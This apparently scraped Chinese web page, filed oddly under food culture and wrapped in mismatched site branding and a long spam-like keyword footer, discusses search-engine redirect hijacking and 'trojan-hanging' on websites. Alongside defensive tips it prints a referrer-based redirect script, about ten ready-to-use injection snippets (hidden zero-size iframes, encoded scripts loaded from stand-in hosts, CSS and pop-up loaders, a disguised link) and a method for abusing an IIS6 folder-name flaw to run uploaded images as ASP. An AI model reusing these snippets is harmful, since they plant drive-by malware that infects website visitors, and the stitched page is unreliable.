熱門搜索:網頁游戲 火箭球賽 熱門音樂 2011世界杯 亞運會 黃海軍演
您現在的位置:首頁 >> 美食文化 >> 內容

關于用搜索引擎搜索出來網站跳轉的問題解決和常見的掛馬代碼

時間:2014-12-11 13:25:04 點擊:

 

 

  (信宜新聞網/訊)關于“網站直接輸入域名正常進入,用搜索引擎搜索出來的鏈接點擊進入,就直接跳轉到其他網址”這個問題,相信很多用別人源碼建網的站長都碰到過,那么要怎么解決呢,這個問題難倒了不少站長,請耐心看完本文。

 

      1.var regexp=/\.(baidu)(\.[a-z0-9\-]+) {1,2}\//ig;var where =document.referrer;if(regexp.test(whe re)){window.location.href=http://www.1xy.cc/bbs/thread-1970252-1-1.html"百度來的訪客 帶到 的地址"}把代碼存到JS文件 然后網站 首頁調用這個JS文件 就OK了

 

  2.改mdb、改后臺登錄名

 

  3.如果打開圖片不顯示就基本是JS掛馬了

 

  4.把首頁有關js/gif的文件都用文本打開檢查

 

  5.重點檢查數據庫inc.asp、index.asp文件,看看里面是否被修改了數據庫鏈接轉向,有的黑客把Config.asp備份了一個,只不過備份的Config.asp名字改了,但是inc鏈接的是這個被改了名字的Config.asp。所以從搜索引擎進入就會跳轉到別人網站。本人以前也遇到過這樣的事情,后來把網站源碼檢查了一遍才找到這個inc.asp出了問題。

 

  二、.原來的文件即可。 修補漏洞(修補網站漏洞也就是做一下 網站安全。) 1、修改網站后臺的用戶名和密碼及后 臺的默認路徑。 2、更改數據庫名,如果是ACCESS數據 庫,那文件的擴展名最好不要用mdb, 改成ASP的,文件名也可以多幾個特殊 符號。 3、接著檢查一下網站有沒有注入漏洞 或跨站漏洞,如果有的話就相當打上防 注入或防跨站補丁。 4、檢查一下網站的上傳文件,常見了 有欺騙上傳漏洞,就對相應的代碼進行 過濾。 5、盡可能不要暴露網站的后臺地址, 以免被社會工程學猜解出管理用戶和密 碼。 6、寫入一些防掛馬代碼,讓框架代碼 等掛馬無效。 7、禁用FSO權限也是一種比較絕的方 法。 8、修改網站部分文件夾的讀寫權限。 9、如果你是自己的服務器,那就不僅 要對你的網站程序做一下安全了,而且 要對你的服務器做一下安全也是很有必 要了! 補充一下:盡量不要下載網上的那一些 免費程序,因為那一些程序中大部分都有后門。

 

  三、如果你是自己寫的代碼,每一行什么含 義、什么作用肯定很清楚,一行一行查 找分析。 如果是別人代寫的,或者是下載的,那 就讓寫的人幫助檢查,或者使用備份文 件覆蓋,或者重新下載一個覆蓋被嵌入 惡意代碼的頁面。 如果這些條件都不具備,試著自己逐行 檢查,看看是否有類似script、iframe 的字符,刪除后檢查還有沒有惡意代碼 嵌入的癥狀(記得做備份),還有要查 看有沒有一串毫無意義的字符比 如“%B6%F1%D2%E2%B4%FA%C2%EB” 表示“惡意代碼”四個字,只是經過簡單 加密,正常網頁中不應該出現。

 

  四、這個前綴是可以隨意更換的,我 上面取名為"v",例如我可以換成: abc123:expression(this.src='about:b lank',this.outerHTML=''); 掛木馬的家 伙得先看你的CSS里這個前綴,然后掛 馬的時候寫成這樣<iframe style="abc123:expression() !important" src="URL"></iframe>,那 個前綴一定要是和你的網站一樣的 (abc123),才能掛到馬,哈哈哈!如 果把前綴做成動態的,就非常OK了, 看你怎么掛!

 

  五、知識重點:如何防止網站被掛馬?掛 馬代碼大全 做網站的人知道也不小心 網站就被黑客掛了木馬那個頭痛呀! 首先引起了網友的反感。從些不在上 自己的網站。搜索還懲罰,真是倒霉 呀。下面我們就了解一下,網站是..

 

  六、如何防止網站被掛馬?掛馬代碼大全

 

  做網站的人知道也不小心網站就被黑 客掛了木馬那個頭痛呀!首先引起了 網友的反感。從些不在上自己的網 站。搜索還懲罰,真是倒霉呀。下面 我們就了解一下,網站是如何中 毒的。

 

  1:框架掛馬

 

  <iframe src=地址 width=0 height=0> </iframe>

 

  2:js文件掛馬

 

  首先將以下代碼

 

  document.write("<iframe width='0' height='0' src='地址'></iframe>");

 

  保存為xxx.js,

 

  則JS掛馬代碼為

 

  <script language=javascript src=xxx.js></script>

 

  3:js變形加密

 

  <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt> </script>

 

  muma.txt可改成任意后綴 電腦知識

 

  4:body掛馬

 

  <body ></body>

 

  5:隱蔽掛馬

 

  top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

 

  6:css中掛馬

 

  body {

 

  background-image: url('javascript:document.write(" <script src=http://www.XXX.net/muma.js></script>")')}

 

  7:JAJA掛馬

 

  <SCRIPT language=javascript>

 

  window.open ("地 址","","toolbar=no,location=no,directo ries=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

 

  </script>

 

  8:圖片偽裝

 

  <html>

 

  <iframe src="網馬地址" height=0 width=0></iframe>

 

  <img src="圖片地址"></center>

 

  </html>

 

  9:偽裝調用:

 

  <frameset rows="444,0" cols="*">

 

  <frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

 

  <frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

 

  </frameset>

 

  10:高級欺騙

 

  <a href="http://www.163.com(迷惑 連接地址,顯示這個地址指向木馬地 址)" > 頁面要顯示的內容 </a>

 

  <SCRIPT Language="JavaScript">

 

  function www_163_com ()

 

  {

 

  var url="網馬地址";

 

  open(url,"NewWindow","toolbar=no,l ocation=no,directories=no,status=no ,menubar=no,scrollbars=no,resizable =no,copyhistory=yes,width=800,heig ht=600,left=10,top=10");

 

  }

 

  </SCRIPT>

 

  七、如何防止網站被掛馬

 

  A。為什么好好的網站會有木馬?一般木馬是來自ASP SHELL和PHP SHELL的程序段控制不嚴,程序上有 上傳功能,沒有進行文件目錄和文件 后綴等的判斷,一般這類的目錄, 以“海陽頂端網ASP木馬”較為流行。因2003平臺IIS6原因,也存在目錄名 問題引起ASP木馬。( 微軟的IIS 6存在 嚴重解析文件名錯誤

 

  測試辦法:在FTP中建立一個 test.asp 的文件夾,文件夾名就是 test.asp ,在這個文件夾中上傳一個 hack.jpg,這個jpg的內容可以直接 是,然后,用IE遠程訪問這個 hack.jpg,你可以發現,它一樣被當 作是ASP文件來運行!顯然,只要你 的網站程序,允許用戶自己建立文件 夾及上傳圖片,黑客就可以上傳圖片 來當作ASP木馬來運行。

 

  解決辦法:所有使用星外虛擬主機管 理平臺的虛擬主機用戶,可以在主機 面板,設置執行權限選項中,直接將 有上傳權限的目錄,取消ASP的運行 權限,就可以解決這個問題。

 

  大家常用的動易2006和動網,BLOG 這類的程序,需要詳細的檢查一下, 并跟著開發者進行相應的安全程序升 級。這樣才能減少因代碼原因引起的

 

  現在最多見的JS掛馬方法有兩種 ,一種是直接將JavaScript腳本代碼 寫在網頁中,當訪問者在瀏覽網頁時 ,惡意的掛馬腳本就會通過用戶的瀏 覽器悄悄地打開網馬窗口,隱藏地運 行。

 

  這種方法使用的關鍵代碼如下:

 

  window.open("http://www.hack er.com/木馬.html","","toolbar=no,loca tion=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,hei ght=1");

 

  這種代碼往往很長,很容易被安 全工程師發現,而且沒有經驗的黑客 也喜歡將“width”和“height=”參數設為 “0”,但是設置為0后,可能會出現惡 意代碼不運行的情況。

 

  另外一種JS掛馬方式是,黑客先 將掛馬腳本代碼“document.write('<If rame src="網頁木馬地址" >

 

  或者

 

  document.write("

 

  ")

 

  document.write(" ")

 

  document.write("

 

  ")

 

  就成功地將木馬掛到了對方的網頁中了。

 

  小提示:黑客還可以根據情況隨機變換插入的JS掛馬方法。刪除一段和baidu以及http請求相關的VB代碼即可!網站中被插入文件了,檢查有無Global.asa 和Global.asax 文件.

 

 

作者:信宜人 錄入:信宜人 來源:原創
相關評論
發表我的評論
  • 大名:
  • 內容:
  • 關于我們 | 服務條款 | 法律聲明 | 文章發布 | 在線留言 | 法律支援 | 人員認證 | 投訴建議 | 合作聯盟 | 版權所有 | 本站wap手機訪問
  • 南通新聞網(www.fitness4yourbody.com) © 2019 版權所有 All Rights Reserved.
  • 有害短信息舉報 | 陽光·綠色網絡工程 | 版權保護投訴指引 | 網絡法制和道德教育基地 | 南通通管局

  • 南通新聞網 版 權 所 有 ,未 經 書 面 授 權 禁 止 使 用
    商業咨詢 粵ICP備14093650號-1
  • #
  • 安徽体彩网 安徽省 | 萨嘎县 | 灵寿县 | 开原市 | 新河县 | 玉门市 | 云龙县 | 万盛区 | 民县 | 富民县 | 嘉祥县 | 平山县 | 隆回县 | 教育 | 曲水县 | 棋牌 | 衡南县 | 高雄县 | 舒兰市 | 方山县 | 无为县 | 青冈县 | 阳城县 | 泾阳县 | 开封县 | 抚远县 | 酒泉市 | 长汀县 | 班戈县 | 黑龙江省 | 浏阳市 | 白河县 | 五大连池市 | 江华 | 东安县 | 双桥区 | 称多县 | 临夏市 | 岑巩县 | 廉江市 | 济南市 | 福清市 | 晋中市 | 崇左市 | 扎兰屯市 | 青州市 | 乐东 | 两当县 | 宝山区 | 陆川县 | 竹北市 | 肃南 | 理塘县 | 西盟 | 襄城县 | 龙游县 | 普兰店市 | 蓝田县 | 福贡县 | 修武县 | 土默特左旗 | 清河县 | 百色市 | 屯门区 | 福州市 | 石门县 | 比如县 | 三都 | 攀枝花市 | 贞丰县 | 天峻县 | 白朗县 | 白水县 | 阳朔县 | 新密市 | 闵行区 | 清原 | 五台县 | 罗平县 | 乐平市 | 四子王旗 | 上栗县 | 延长县 | 江源县 | 射洪县 | 称多县 | 杂多县 | 青铜峡市 | 色达县 | 永善县 | 德阳市 | 保靖县 | 柘荣县 | 左云县 | 嘉黎县 | 南昌市 | 吉木乃县 | 沂源县 | 斗六市 | 苏尼特右旗 | 温宿县 | 平山县 | 宁武县 | 吴江市 | 唐河县 | 崇仁县 | 温州市 | 安平县 | 宁强县 | 盐源县 | 博爱县 | 大石桥市 | 荥经县 | 福鼎市 | 额敏县 | 项城市 | 宜丰县 | 河间市 | 珠海市 | 酒泉市 | 维西 | 琼结县 | 乡宁县 | 丰镇市 | 江都市 | 青浦区 | 宁城县 | 凤冈县 | 诸城市 | 南陵县 | 沿河 | 合肥市 | 楚雄市 | 登封市 | 佛坪县 | 南开区 | 论坛 | 中超 | 沙雅县 | 邢台市 | 嫩江县 | 昌乐县 | 兰考县 | 遂昌县 | 九龙城区 | 浪卡子县 | 大方县 | 阳新县 | 家居 | 济源市 | 桦南县 | 新宁县 | 苗栗县 | 抚州市 | 云南省 | 崇信县 | 苏尼特左旗 | 昌吉市 | 乌审旗 | 搜索 | 临高县 | 拉孜县 | 都兰县 | 米易县 | 沂水县 | 肇东市 | 台湾省 | 夏津县 | 江城 | 呼玛县 | 南投市 | 达拉特旗 | 驻马店市 | 丘北县 | 金华市 | 新干县 | 惠来县 | 梁平县 | 潞西市 | 茂名市 | 长沙市 | 象山县 | 六安市 | 托克逊县 | 柳州市 | 尤溪县 | 平泉县 | 沙洋县 | 恭城 | 抚宁县 | 潢川县 | 南宁市 | 龙州县 | 丰都县 | 旬阳县 | 万宁市 | 万盛区 | 五莲县 | 宣城市 | 广平县 | 阿克陶县 | 保山市 | 若尔盖县 | 新乡县 | 灵寿县 | 吉安县 | 中宁县 | 石楼县 | 潍坊市 | 凭祥市 | 甘德县 | 旬阳县 | 陇川县 | 荣昌县 | 石屏县 | 奉节县 | 金溪县 | 平定县 | 喀喇沁旗 | 久治县 | 寿宁县 | 阿勒泰市 | 长武县 | 上虞市 | 丹棱县 | 高阳县 | 莆田市 | 鄱阳县 | 禹城市 | 新津县 | 温宿县 | 册亨县 | 房山区 | 密山市 | 涟源市 | 嵊泗县 | 米泉市 | 尉氏县 | 巨鹿县 | 南平市 | 康定县 | 临海市 | 甘肃省 | 集贤县 | 鹰潭市 | 平舆县 | 边坝县 | 东兰县 | 洛阳市 | 阳山县 | 遂宁市 |